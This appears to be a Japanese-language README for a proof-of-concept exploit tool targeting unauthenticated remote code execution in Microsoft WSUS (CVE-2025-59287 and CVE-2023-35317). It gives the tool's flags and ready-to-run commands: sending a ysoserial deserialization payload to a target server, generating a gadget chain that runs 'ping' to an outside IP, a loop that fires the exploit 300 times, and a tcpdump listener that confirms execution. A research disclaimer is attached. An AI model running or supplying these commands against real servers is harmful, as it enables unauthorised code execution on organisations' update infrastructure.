
Microsoft Windows Server Update Service (WSUS) における認証不要のRCE PoC - CVE-2025-59287 & CVE-2023-35317
CVE-2025-59287 の詳細: WSUS における SoapFormatter RCE: https://shellcode.blog/wsus-cve-2025-59287-investigation/
本ソフトウェアは、学術研究および効果的な防御技術の開発のみを目的として作成されており、明示的に許可された場合を除き、システムへの攻撃に使用することを意図していません。プロジェクトメンテナーは、ソフトウェアの誤用について一切の責任を負いません。責任を持って使用してください。
必須フラグ:
--target-url – ターゲット WSUS サーバーのベース URL(例: http://WIN-246JC0TE3BB.vuln.local:8530)--cve – CVE-2023-35317 または CVE-2025-59287 のいずれかオプションフラグ:
--dns-name – SOAP リクエストで使用されるクライアント DNS 名(デフォルト: bugcrowd.local)--random – --dns-name の先頭にランダムなサブドメインを付加し、実行のたびに新しいクライアントとして表示されるようにします--payload – カスタムの base64 エンコードされた ysoserial ペイロード。省略した場合、選択した --cve 用の内蔵ペイロードが使用されます--debug – 詳細なデバッグログを有効にします([DEBUG] 行)python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2025-59287 --randompython3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --dns-name bugcrowd.local --cve CVE-2023-35317 --random./ysoserial.exe -g RolePrincipal -f BinaryFormatter -c 'ping 18.118.100.100' -o base64(または --cve CVE-2023-35317 用の内蔵ペイロードに依存する場合もあります)for i in `seq 1 300`; do sleep 1; python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2023-35317 --random ;donesudo tcpdump -l -n -i any icmp | while read line; do echo "$line"; echo -ne '\a'; done